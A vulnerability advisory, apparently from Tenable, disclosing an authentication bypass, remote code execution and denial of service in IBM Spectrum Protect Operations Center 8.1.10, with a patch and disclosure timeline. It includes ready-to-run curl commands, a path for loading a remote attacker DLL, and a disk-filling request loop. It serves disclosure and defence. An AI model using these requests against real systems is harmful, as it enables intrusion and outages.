Facebook Google Plus Twitter LinkedIn YouTube RSS Menu Search Resource - BlogResource - WebinarResource - ReportResource - Eventicons_066 icons_067icons_068icons_069icons_070

IBM Spectrum Protect Operations Center 8.1.10 Multiple Vulnerabilities

High

Synopsis

CVE-2020-4954: Authentication Bypass

CVSSv3 Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N)

CVSSv3 Base Score: 6.5

After installation the Operations Center needs to configure a Spectrum Protect server as its hub server through its web UI. During configuration, the hub server's IP:port and administrative credentials are used to access the hub server. After the Operations Center has associated with a hub server, a user can login to the Operations Center using the administrative credentials stored in the hub server.

An unauthenticated remote attacker can still login to the Operations Center that has already configured a hub server via URL endpoint /oc/configuration. The attacker sets up his/her own Spectrum Protect server and supplies his/her own IP:port and credentials in the configuration page. This allows the attacker to obtain an authenticated session with the Operations Center.

After logging in, it appears that the attacker cannot perform operations that require access to the configured hub server because the login session has attacker's credentials, which would not match the credentials configured for the hub server. However, s/he can perform other authenticated operations that don't require hub server access. For example, the attacker can enable logging for various components in OpsCntrLog.config and view the log contents by making RPC calls to com.ibm.tsm.gui.rpc.handlers.DebugRPC.

The following steps are used to get an authenticated session with the Operations Center:

a) Fetch a login JSESSIONID and xtoken (for XSRF protection)

curl -kis --tlsv1.2  'https://<spoc_host>:11090/oc/configuration' | egrep 'JSESSIONID|xtoken' 
Set-Cookie: JSESSIONID=0000HTCQksYD8Jr60DyZAj15mXa:50e18252-bcbc-4523-aa0b-79391fe7cec3; Path=/oc; Secure; HttpOnly
        <input type="hidden" name="xtoken" id="xtoken" value=EEEEFFED-645A-4514-955C-C336EF236403></input>

b) Login to Operations Center using credentials on attacker-controlled Spectrum Protect server; 302 = success

curl -kis --tlsv1.2 --cookie 'JSESSIONID=0000HTCQksYD8Jr60DyZAj15mXa:50e18252-bcbc-4523-aa0b-79391fe7cec3' -H 'Host: <spoc_host>:11090' -H 'Origin: https://<spoc_host>:11090' -d 'connectto=<attacker_controlled_server>%3A1500&login=<attacker_login>&password=<attacker_passwd>&useSSL=true&useTLS12Only=true&tzoffset=300&nextURL=&xtoken=EEEEFFED-645A-4514-955C-C336EF236403' -D - -o /dev/null 'https://<spoc_host>:11090/oc/configuration'
HTTP/1.1 302 Found
X-FRAME-OPTIONS: SAMEORIGIN
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval'; connect-src wss: https:; img-src 'self' data: *; font-src 'self' data:; report-uri csp-report
Strict-Transport-Security: max-age=31536000; includeSubDomains
Location: https://<spoc_host>:11090/oc/gui#configure

CVE-2020-4955: QueryReadStoreCache Authenticated RCE

CVSSv3 Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)

CVSSv3 Base Score: 8.8

An authenticated remote attacker can send a specially crafted HTTP POST message to /oc/QueryReadStoreCache/ to load an attacker-controlled library file (i.e., DLL) into the Operations Center process, leading to remote code execution.

The following snippet shows the vulnerability:

    protected void handlePost(final HttpServletRequest req, final HttpServletResponse resp) throws ServletException, IOException {
        QueryReadStoreCache.log.logInfo("Url " + req.getRequestURI());
        final String[] url = req.getRequestURI().split("/");
        if (url.length < 5) {
            throw new IllegalStateException("The service requires at least 4 paths within the url");
        }
        try {
            final Map params = req.getParameterMap();
            final String serverName = req.getParameter("server");
            final Class<?> classInstance = Class.forName(url[3]);
            final Method method = classInstance.getMethod(url[4], (Class<?>[])QueryReadStoreCache.CLASS_ARGUMENT);
            final JSONArray list = JSONUtils.getFirstItemsArray(((JSONString)method.invoke(null, serverName)).toString());
[...]

The POST handler extracts a Java class (url[3]) and a method name for that class (url[4]) from the URL and invokes the method. The method should be a static method that takes a single parameter, which is supplied by the 'server' URL parameter. If the attacker sends a POST message to URL /oc/QueryReadStoreCache/java.lang.System/load with the 'server' parameter set to '\\\some_share\evil.dll', the attacker-controlled evil DLL gets loaded into the Operations Center process, leading to RCE.

When used in conjunction with vulnerability 1), the attacker can achieve unauthenticated RCE under the security context of the account running the Operations Center (i.e., the SYSTEM account on Windows).

CVE-2020-4956: DebugRPC Authenticated Remote DoS

CVSSv3 Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H)

CVSSv3 Base Score: 7.1

An authenticated attacker can issue a 'setCacheValue' RPC call to set a large cache value in the Operations Center cache and then repeatedly issue a 'dumpCache' RPC call to create a large number of large cache dump files on the Operations Center host. This can fill up the file system where the cache dump files reside, leading to DoS.

When used in conjunction with vulnerability 1), the attacker can achieve unauthenticated Remote DoS.

Here are the steps to create the cache dump files:

a) From vulnerability 1), an authenticated JSESSIONID and a xtoken are obtained.

b) Now that we have an authenticated JSESSIONID with Operations Center, we can create a large CacheValue in the SPOC cache

echo -en '{"clazz":"com.ibm.evo.rpc.RPCRequest","methodClazz":"com.ibm.tsm.gui.rpc.handlers.DebugRPC","methodName":"setCacheValue","methodArgs":["KEY1","'$(python3 -c "print('A'*10000000)")'"]}' > /tmp/cacheValue1

curl -kis --tlsv1.2 --cookie 'JSESSIONID=0000HTCQksYD8Jr60DyZAj15mXa:50e18252-bcbc-4523-aa0b-79391fe7cec3' -H 'Host: <spoc_host>:11090' -H 'Origin: https://<spoc_host>:11090' -H 'xtoken: EEEEFFED-645A-4514-955C-C336EF236403' -H 'Content-Type: application/json-rpc' -d @/tmp/cacheValue1 --compress 'https://<spoc_host>:11090/oc/RPCAdapter'

c) Repeatedly dump the cache

while true; do curl -kis --tlsv1.2 --cookie 'JSESSIONID=0000HTCQksYD8Jr60DyZAj15mXa:50e18252-bcbc-4523-aa0b-79391fe7cec3' -H 'Host: <spoc_host>:11090' -H 'Origin: https://<spoc_host>:11090' -H 'xtoken: EEEEFFED-645A-4514-955C-C336EF236403' -H 'Content-Type: application/json-rpc' -d '{"clazz":"com.ibm.evo.rpc.RPCRequest","methodClazz":"com.ibm.tsm.gui.rpc.handlers.DebugRPC","methodName":"dumpCache","methodArgs":[]}' --compress 'https://<spoc_host>:11090/oc/RPCAdapter'; done

For each dump, a different dump file is created in a temp folder. The attacker can control the size of the dump file by creating one or multiple CacheValues with a size of his/her own choosing. This can fill up the file system, leading to DoS.

C:\Windows\System32\config\systemprofile\AppData\Local\Temp>dir | more
 Volume in drive C has no label.
 Volume Serial Number is 1A68-87EC

 Directory of C:\Windows\System32\config\systemprofile\AppData\Local\Temp

11/13/2020  12:18 AM    <DIR>          .
11/13/2020  12:18 AM    <DIR>          ..
11/13/2020  12:14 AM        10,107,457 cachedump1005002470733379056.txt
11/13/2020  12:14 AM        10,107,457 cachedump1005272695032173425.txt
11/13/2020  12:15 AM        10,107,457 cachedump1011400486671420073.txt
11/13/2020  12:12 AM        10,107,457 cachedump101157961566663795.txt
[...]

Solution

Upgrade to 7.1.13.000, 8.1.10.200, or 8.1.11.100. For further information, visit https://www.ibm.com/support/pages/node/6404966.

Disclosure Timeline

11/16/2020 - Vulnerabilities reported to IBM PSIRT. 90-day date set to Feb 15, 2021.
11/16/2020 - IBM thanks us for sending the report. They will review and follow up with their analysis.
12/04/2020 - Tenable asks for an update.
12/09/2020 - IBM confirms the vulnerability and is developing a remediation plan. Asks for the opportunity to remediate prior to public disclosure.
12/09/2020 - Tenable thanks IBM for confirmation. Clarifies our disclosure policy and intent to publish on Feb 15, 2021 with or without a patch.
01/04/2021 - Tenable asks for an update.
01/22/2021 - IBM is still reviewing the vulnerability. They intend to contact us when they have a resolution. Asks for the opportunity to remediate prior to public disclosure.
02/08/2021 - Tenable reminds IBM of upcoming 90-day disclosure date. Asks if a patch will be ready.

All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.

Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.

For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.

If you have questions or corrections about this advisory, please email [email protected]

Try for Free Buy Now
Tenable.io FREE FOR 30 DAYS

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Sign up now.

Tenable.io BUY

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

65 assets

Choose Your Subscription Option:

Buy Now
Try for Free Buy Now

Try Nessus Professional Free

FREE FOR 7 DAYS

Nessus® is the most comprehensive vulnerability scanner on the market today. Nessus Professional will help automate the vulnerability scanning process, save time in your compliance cycles and allow you to engage your IT team.

Buy Nessus Professional

Nessus® is the most comprehensive vulnerability scanner on the market today. Nessus Professional will help automate the vulnerability scanning process, save time in your compliance cycles and allow you to engage your IT team.

Buy a multi-year license and save. Add Advanced Support for access to phone, community and chat support 24 hours a day, 365 days a year. Full details here.

Try for Free Buy Now

Try Tenable.io Web Application Scanning

FREE FOR 30 DAYS

Enjoy full access to our latest web application scanning offering designed for modern applications as part of the Tenable.io platform. Safely scan your entire online portfolio for vulnerabilities with a high degree of accuracy without heavy manual effort or disruption to critical web applications. Sign up now.

Buy Tenable.io Web Application Scanning

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

5 FQDNs

$3,578

Buy Now

Try for Free Contact Sales

Try Tenable.io Container Security

FREE FOR 30 DAYS

Enjoy full access to the only container security offering integrated into a vulnerability management platform. Monitor container images for vulnerabilities, malware and policy violations. Integrate with continuous integration and continuous deployment (CI/CD) systems to support DevOps practices, strengthen security and support enterprise policy compliance.

Buy Tenable.io Container Security

Tenable.io Container Security seamlessly and securely enables DevOps processes by providing visibility into the security of container images – including vulnerabilities, malware and policy violations – through integration with the build process.

Try for Free Contact Sales

Try Tenable Lumin

FREE FOR 30 DAYS

Visualize and explore your Cyber Exposure, track risk reduction over time and benchmark against your peers with Tenable Lumin.

Buy Tenable Lumin

Contact a Sales Representative to see how Lumin can help you gain insight across your entire organization and manage cyber risk.